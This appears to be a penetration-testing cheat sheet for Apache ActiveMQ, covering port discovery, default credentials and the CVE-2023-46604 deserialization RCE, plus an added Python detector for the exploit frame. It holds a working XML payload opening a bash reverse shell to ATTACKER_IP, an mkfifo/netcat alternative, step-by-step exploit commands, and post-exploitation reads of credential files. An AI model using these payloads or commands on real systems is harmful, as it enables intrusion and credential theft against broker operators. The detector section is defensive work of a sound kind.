
# Apache ActiveMQ

Message broker software - often runs with elevated privileges.


## Discovery

Default ports:

| Port  | Service                   |
|-------|---------------------------|
| 8161  | Web Console (HTTP/Jetty)  |
| 61616 | OpenWire transport        |
| 61613 | STOMP                     |
| 61614 | HTTP/WebSocket            |
| 5672  | AMQP                      |
| 1883  | MQTT                      |

```bash
# Nmap detection
nmap -sC -sV -p 8161,61616,61613,61614,5672,1883 $ip
```

Banners and strings to look for in the scan output:

- `ActiveMQ OpenWire transport`
- `basic realm=ActiveMQRealm`
- `Jetty(9.4.x)`

## Default Credentials

| Username | Password |
|----------|----------|
| admin    | admin    |
| (blank)  | (blank)  |

Web console: `http://TARGET:8161/admin/`


## CVE-2023-46604 - RCE (OpenWire Deserialization)

Affected: Apache ActiveMQ < 5.15.16, < 5.16.7, < 5.17.6, < 5.18.3

Port: 61616 (OpenWire transport)

### Exploit Repositories

```bash
# Go version (recommended)
git clone https://github.com/rootsecdev/CVE-2023-46604.git

# Python version
git clone https://github.com/evkl1d/CVE-2023-46604.git
```

### Malicious XML Payload

Create `poc-linux.xml`:

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans
   http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>bash</value>
            <value>-c</value>
            <value>bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/9001 0&gt;&amp;1</value>
        </list>
        </constructor-arg>
    </bean>
</beans>
```

Alternative payload (mkfifo):

```xml
<value>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc ATTACKER_IP 9001 &gt;/tmp/f</value>
```

### Exploitation Steps

```bash
# 1. Host the XML payload
python3 -m http.server 8000

# 2. Start listener
nc -nlvp 9001

# 3. Run exploit (Go version)
./ActiveMQ-RCE -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml

# Python version
python3 exploit.py -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml
```

### Verify Vulnerability

If the hosted web server receives the request for the XML but no shell comes back, check the XML payload's encoding: `>` must be written as `&gt;` and `&` as `&amp;` inside the `<value>` elements.
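As an added, defender-side example that is not part of this cheat sheet or of the linked exploit repositories: a small Python detector for the OpenWire frame shape these PoCs send to port 61616. It assumes the loose OpenWire encoding used by the public PoCs (a presence byte followed by a length-prefixed UTF string for the Throwable class and message), parses the `ExceptionResponse`, and flags the Spring XML context classes or a URL-shaped "message"; `build_sample_frame` exists only to construct the sample input.

```python
import struct

EXCEPTION_RESPONSE = 31  # OpenWire command type byte for ExceptionResponse
SUSPICIOUS_CLASSES = {   # Spring classes whose String constructor loads remote bean definitions
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "org.springframework.context.support.FileSystemXmlApplicationContext",
}

def _read_loose_string(buf, off):
    """Loose-encoded OpenWire string: 1-byte presence flag, then Java writeUTF (u16 length + bytes)."""
    if buf[off] == 0:
        return None, off + 1
    (n,) = struct.unpack_from(">H", buf, off + 1)
    return buf[off + 3:off + 3 + n].decode("utf-8"), off + 3 + n

def parse_exception_response(frame):
    """Return (throwable_class, message) from a loose-encoded ExceptionResponse frame, else None."""
    (length,) = struct.unpack_from(">I", frame, 0)
    body = frame[4:4 + length]
    if len(body) < 11 or body[0] != EXCEPTION_RESPONSE:
        return None
    off = 1 + 4 + 1 + 4  # command type, commandId, responseRequired, correlationId
    if body[off] == 0:   # no Throwable attached
        return None
    clazz, off = _read_loose_string(body, off + 1)
    message, _ = _read_loose_string(body, off)
    return clazz, message

def is_cve_2023_46604_attempt(frame):
    """Exploit signature: Throwable 'class' is a Spring XML context, or its 'message' is a URL."""
    parsed = parse_exception_response(frame)
    if parsed is None:
        return False
    clazz, message = parsed
    if clazz in SUSPICIOUS_CLASSES:
        return True
    return bool(message) and message.lower().startswith(("http://", "https://"))

def build_sample_frame(clazz, message):
    """Constructed test input only: an ExceptionResponse in the loose layout parsed above."""
    def s(v):
        b = v.encode("utf-8")
        return b"\x01" + struct.pack(">H", len(b)) + b
    body = bytes([EXCEPTION_RESPONSE]) + struct.pack(">IBI", 0, 0, 0) + b"\x01" + s(clazz) + s(message)
    return struct.pack(">I", len(body)) + body

# Constructed samples: an ordinary broker error versus a frame shaped like the public PoCs
BENIGN = build_sample_frame("java.lang.SecurityException", "User name or password is invalid.")
EXPLOIT_LIKE = build_sample_frame("org.springframework.context.support.ClassPathXmlApplicationContext",
                                  "http://ATTACKER_IP:8000/poc-linux.xml")  # placeholder URL from the sheet
```

A client-to-broker `ExceptionResponse` is itself unusual, so in a network sensor the direction of the frame is a useful additional filter.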

## Post-Exploitation

ActiveMQ often runs as a dedicated user:

```bash
# Check user
id
# uid=1000(activemq) gid=1000(activemq)

# Config files
ls -la /opt/apache-activemq-*/conf/
cat /opt/apache-activemq-*/conf/activemq.xml
cat /opt/apache-activemq-*/conf/jetty-realm.properties
cat /opt/apache-activemq-*/conf/credentials.properties
```

## References